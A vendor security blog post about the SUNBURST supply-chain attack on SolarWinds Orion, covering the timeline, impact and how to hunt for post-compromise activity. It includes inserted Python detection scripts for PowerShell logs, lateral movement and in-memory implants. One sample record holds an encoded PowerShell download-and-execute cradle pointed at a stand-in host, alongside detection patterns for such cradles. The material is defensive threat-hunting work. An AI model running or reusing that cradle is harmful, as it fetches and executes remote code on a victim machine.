SUNBURST – Where We Are Now – 2021

Chris Gerritz

I’ve been in the incident response game long enough to know that holiday plans have to be flexible. 2020, a historic year for sure, ended with the discovery of the malicious backdoors known as SUNBURST and SUPERNOVA in SolarWinds software. While the security industry, governments, and the vendor reacted, Infocyte was assisting customers and partners in searching for the impacted software and for any associated exploitation of it as information continued to be released.

So where are we now? What did we learn? What’s left to be done?


  • March 2020 – Backdoored version of SolarWinds Orion delivered to customers
  • 8 December – FireEye announced it had been attacked by a highly skilled and coordinated adversary
  • 13 December – FireEye investigation leads to discovery of the SolarWinds Orion backdoor dubbed SUNBURST
  • 14 December – SolarWinds filed with the SEC that 13,000 of its 300,000 customers were impacted by the backdoored Orion software, making it the largest supply chain attack ever
  • 15 December – Microsoft coalition seizes key command and control domain from the hackers, stopping any new exploitation of the backdoor (does not stop follow-on access if the adversary previously leveraged the backdoor)
  • 15-23 December – Several updates/patches to Orion released addressing the vulnerabilities and backdoors
  • 31 December – Microsoft, a SolarWinds Orion user, announced its source code repositories had been accessed via this incident
  • 5 January – US intelligence agencies officially link the attack to a Russian government (possibly Cozy Bear / APT29) intelligence gathering operation

How Bad Was It Really?

Orion app versions 2019.4 through 2020.2.1, released between March 2020 and June 2020, were tainted with malware. 13,000 customers had these versions installed in their network but not all were exploited by the hackers.

Investigations continue, so we assume these numbers will rise, but so far the number of organizations with Orion that the hackers are confirmed to have actually accessed is in the hundreds. Unfortunately these are some of the largest and most sensitive targets: multiple government agencies such as the Commerce and Treasury Departments, private companies such as Microsoft, Intel, Nvidia, and Cisco, and security companies like FireEye.

We have not even come close to an accounting of the true impact, and I suspect we will see more organizations come forward. In addition, the long multi-month access these hackers had inside many prominent software vendors should make us assume the hackers at least tried to embed more backdoors in other widely used software.

Given what Infocyte has seen in searching for these compromises, many networks like hospitals, banks, and others that had the vulnerable software showed no evidence of exploitation. Still, many orgs are not able to search for evidence of exploitation or verify whether an attack took place in the past. We assume, unfortunately, that many will just remove SolarWinds and move on.

What Does Exploitation of SUNBURST Look Like?

The SUNBURST and SUPERNOVA backdoors are NOT fully featured malware. They are simply small embedded routines that perform some security pre-checks and call home for instructions. When desired, the backdoor enables the hacker to send their primary malware and commands down to fully take over the server and begin pivoting out to the rest of the targeted network.

Figure: Sunburst Malware Scanner Results from Infocyte Platform

Almost all hacking leaves traces, and these cases are no different. Exploited networks will show a lot of malicious PowerShell usage, administrative credential misuse, lateral movement, follow-on in-memory malware injected into processes, and alternate persistence mechanisms left behind.

Depending on your endpoint visibility and logging configuration, you should set your expectations:

  • Default logging is woefully inadequate to see most of this. You’ll need an active forensic triage toolset (like Infocyte) to discover artifacts and malware presence
  • Most endpoint protection software will silently log but not alert due to the complexity and false positive potential of such behavior. You’ll need to review these logs manually
  • Only active behavioral monitoring (like Infocyte in monitor-mode) has a chance to alert on some of the post-compromise behavior. Even with alerts, a competent team is often required to handle, analyze and respond to the alerts for this type of behavior. Threat hunters should go back and review these alerts using the publicized indicators of compromise to make sure they didn’t miss anything.
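The manual log review described above is where most of these behaviors are actually caught. The following is an added example, not Infocyte's code or anything from the original post: a small Python hunt over constructed Windows event records (Security 4624 logons and PowerShell/Operational 4104 script blocks, not real telemetry) that flags two of the behaviors named above, encoded or download-cradle PowerShell, and a privileged account fanning out to many hosts over network logons in a short window. The account names, host names, IP address and the privileged-account list are all assumptions made up for the example.

```python
"""Hunt over endpoint logs for two post-compromise behaviours: malicious
PowerShell and an administrative credential fanning out over network logons.
Event records below are constructed for this example in the shape of Windows
Security 4624 and PowerShell/Operational 4104 events; not real telemetry."""
import base64
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed: a download cradle hidden behind -EncodedCommand (UTF-16LE base64),
# the way script-block logging and command lines commonly record it.
_CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage')"
_ENCODED = base64.b64encode(_CRADLE.encode("utf-16le")).decode("ascii")

SAMPLE_EVENTS = [
    # PowerShell/Operational 4104 script block logging (constructed)
    {"id": 4104, "time": "2020-12-10T02:14:05", "host": "SRV-ORION01",
     "script": "Get-ChildItem 'C:\\Program Files (x86)\\SolarWinds'"},
    {"id": 4104, "time": "2020-12-10T02:15:11", "host": "SRV-ORION01",
     "script": f"powershell.exe -nop -w hidden -enc {_ENCODED}"},
    # Security 4624 logons (constructed); logon_type 3 = network, 2 = interactive
    {"id": 4624, "time": "2020-12-10T02:16:40", "host": "SRV-ORION01",
     "account": "CORP\\svc_orion", "logon_type": 3, "src_ip": "10.0.5.23"},
    {"id": 4624, "time": "2020-12-10T02:20:02", "host": "SRV-DC01",
     "account": "CORP\\da_admin", "logon_type": 3, "src_ip": "10.0.5.23"},
    {"id": 4624, "time": "2020-12-10T02:24:37", "host": "SRV-FILE02",
     "account": "CORP\\da_admin", "logon_type": 3, "src_ip": "10.0.5.23"},
    {"id": 4624, "time": "2020-12-10T02:29:13", "host": "SRV-EXCH01",
     "account": "CORP\\da_admin", "logon_type": 3, "src_ip": "10.0.5.23"},
    {"id": 4624, "time": "2020-12-10T02:33:58", "host": "WS-FIN-07",
     "account": "CORP\\da_admin", "logon_type": 3, "src_ip": "10.0.5.23"},
    {"id": 4624, "time": "2020-12-10T08:01:00", "host": "WS-HR-12",
     "account": "CORP\\jsmith", "logon_type": 2, "src_ip": "-"},
]

# Assumption: the hunter supplies the site's own list of privileged accounts.
PRIVILEGED_ACCOUNTS = {"CORP\\svc_orion", "CORP\\da_admin"}

ENC_RE = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})", re.I)
CRADLE_RE = re.compile(
    r"Invoke-Expression|\bIEX\b|FromBase64String|DownloadString|Net\.WebClient", re.I)


def decode_encoded_command(b64):
    """-EncodedCommand carries UTF-16LE text; return it, or None if not decodable."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def hunt_powershell(events):
    """Flag 4104 script blocks that are encoded or contain a download/exec cradle,
    decoding the payload so the reviewer sees what actually ran."""
    findings = []
    for ev in events:
        if ev["id"] != 4104:
            continue
        match = ENC_RE.search(ev["script"])
        decoded = decode_encoded_command(match.group(1)) if match else None
        reasons = []
        if match:
            reasons.append("encoded command")
        if CRADLE_RE.search(decoded or ev["script"]):
            reasons.append("download/execution cradle")
        if reasons:
            findings.append({"host": ev["host"], "time": ev["time"],
                             "reasons": reasons, "decoded": decoded})
    return findings


def hunt_lateral_movement(events, privileged, min_hosts=3, window=timedelta(minutes=30)):
    """Flag a privileged account whose network logons reach min_hosts or more
    distinct machines inside one sliding time window."""
    per_account = defaultdict(list)
    for ev in events:
        if ev["id"] == 4624 and ev["logon_type"] == 3 and ev["account"] in privileged:
            per_account[ev["account"]].append(
                (datetime.fromisoformat(ev["time"]), ev["host"], ev["src_ip"]))
    findings = []
    for account, logons in per_account.items():
        logons.sort()
        best = set()
        for i, (start, _, _) in enumerate(logons):
            in_window = {host for t, host, _ in logons[i:] if t - start <= window}
            if len(in_window) > len(best):
                best = in_window
        if len(best) >= min_hosts:
            findings.append({"account": account, "distinct_hosts": len(best),
                             "hosts": sorted(best),
                             "sources": sorted({src for _, _, src in logons})})
    return findings


if __name__ == "__main__":
    for finding in hunt_powershell(SAMPLE_EVENTS):
        print("PowerShell:", finding)
    for finding in hunt_lateral_movement(SAMPLE_EVENTS, PRIVILEGED_ACCOUNTS):
        print("Lateral movement:", finding)
```

Both detections deliberately decode and enrich rather than just match: an encoded command is only reviewable once the UTF-16LE payload is visible, and a burst of admin logons is only meaningful when the distinct destination hosts and the single source address are shown together. Tune `min_hosts` and `window` to what your administrators legitimately do; the thresholds here are illustrative.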

Hunting for Compromise

Whether actively monitoring or not, it’s important to perform an active hunt for the above behaviors and for the presence of follow-on malware. Infocyte has a hunting extension built just for this purpose to augment our standard hunting routines:

Infocyte Blog: Hunting for SolarWinds Orion Compromises

In several cases, the follow-on malware they sent down was Cobalt Strike, a popular penetration test platform whose source code was cracked and proliferated on the dark web. This malware is in-memory only and leaves few or no traces on file systems and in logs.

Infocyte Blog: Cobalt Strike: The New Favorite Among Thieves

Products like Infocyte find this malware by scanning live memory on all of your systems.
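To make the memory-scanning point concrete, here is an added example that is not Infocyte's scanner or code from the original post. It applies the standard heuristics a memory triage tool uses to find in-memory-only implants (committed executable memory that no on-disk image backs, writable-and-executable regions, and a PE header sitting in private memory, which is the footprint of a reflectively loaded DLL) to a process memory map. The `Region` records are constructed to look like a `VirtualQueryEx` enumeration of a hypothetical process; the addresses, sizes and byte prefixes are made up, while the `MEM_*` and `PAGE_*` constants are the real Win32 values. A real scanner would fill the table from the live process.

```python
"""Triage a process's memory map for what file-based tooling cannot see:
committed, executable memory that no image on disk backs.  Region records are
constructed here in the shape of a VirtualQueryEx enumeration; a real scanner
would fill them from the live process."""
from dataclasses import dataclass
from typing import List, Optional

# Windows memory constants (winnt.h)
MEM_COMMIT = 0x1000
MEM_PRIVATE = 0x20000
MEM_MAPPED = 0x40000
MEM_IMAGE = 0x1000000
PAGE_READWRITE = 0x04
PAGE_EXECUTE = 0x10
PAGE_EXECUTE_READ = 0x20
PAGE_EXECUTE_READWRITE = 0x40
PAGE_EXECUTE_WRITECOPY = 0x80
EXECUTABLE = {PAGE_EXECUTE, PAGE_EXECUTE_READ, PAGE_EXECUTE_READWRITE, PAGE_EXECUTE_WRITECOPY}


@dataclass
class Region:
    base: int
    size: int
    state: int
    mem_type: int
    protect: int
    mapped_path: Optional[str]   # backing file, if the region is an image or mapping
    head: bytes                  # first bytes read from the region


# Constructed memory map for a hypothetical process (addresses and bytes made up).
SAMPLE_MAP = [
    Region(0x7FF8A1C00000, 0x1F0000, MEM_COMMIT, MEM_IMAGE, PAGE_EXECUTE_READ,
           r"C:\Windows\System32\ntdll.dll", b"MZ\x90\x00"),      # legitimate loaded DLL
    Region(0x1E4B2A00000, 0x100000, MEM_COMMIT, MEM_PRIVATE, PAGE_READWRITE,
           None, b"\x00\x00\x00\x00"),                            # ordinary heap
    Region(0x1E4B3D10000, 0x41000, MEM_COMMIT, MEM_PRIVATE, PAGE_EXECUTE_READWRITE,
           None, b"MZ\x90\x00"),                                  # PE header, no backing file
    Region(0x1E4B4000000, 0x2000, MEM_COMMIT, MEM_PRIVATE, PAGE_EXECUTE_READ,
           None, b"\x48\x89\x5c\x24"),                            # unbacked code, RX only
    Region(0x1E4B5000000, 0x20000, MEM_COMMIT, MEM_MAPPED, PAGE_READWRITE,
           r"C:\Windows\System32\locale.nls", b"\x00\x00\x00\x00"),  # data mapping
]


def triage_regions(regions: List[Region]):
    """Return findings for committed executable regions not backed by an image,
    scored higher when writable (RWX) or when a PE header sits in private memory."""
    findings = []
    for r in regions:
        if r.state != MEM_COMMIT or r.protect not in EXECUTABLE or r.mem_type == MEM_IMAGE:
            continue
        reasons = ["executable memory not backed by an image"]
        score = 1
        if r.protect == PAGE_EXECUTE_READWRITE:
            reasons.append("writable and executable (RWX)")
            score += 1
        if r.mem_type == MEM_PRIVATE and r.head.startswith(b"MZ"):
            reasons.append("PE header in private memory (reflective load)")
            score += 2
        findings.append({"base": hex(r.base), "size": r.size,
                         "score": score, "reasons": reasons})
    # Highest-scoring regions first, so the analyst dumps the worst one first.
    return sorted(findings, key=lambda f: f["score"], reverse=True)


if __name__ == "__main__":
    for finding in triage_regions(SAMPLE_MAP):
        print(finding)
```

The scoring is intentionally coarse. JIT runtimes and some protectors also create unbacked executable memory, so a score of 1 is a lead to confirm by dumping and inspecting the region, while a private RWX region that begins with a PE header is the case worth escalating immediately.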

Remember, hacking groups like APT29 have established tactics for retaining access to networks they care about. In the event of the loss of a primary backdoor like SUNBURST, they often have secondary trojans and access paths, such as stolen administrative credentials or alternate malware, that will re-establish contact at some point in the future. Every incident should be followed up with active hunting for such alternate accesses.

Hunt and Respond with Infocyte

No one should go through a breach alone. If there is anything we can help with, please reach out to us. Existing customers and partners have direct access to our team via the chat interface in the Infocyte app.

For non-Infocyte customers we offer a free version of our platform with our community edition here. This can be used to analyze, assess, and address potential compromises to your network.

Please reach out to us or an Infocyte partner if you need assistance. Good hunting!

*** This is a Security Bloggers Network syndicated blog from Blog – Infocyte authored by Chris Gerritz. Read the original post at:

Chris is a retired Air Force cybersecurity officer and veteran who pioneered defensive cyber threat hunting operations for the U.S. Air Force — standing up their first interactive Defensive Counter Cyberspace (DCC) practice.
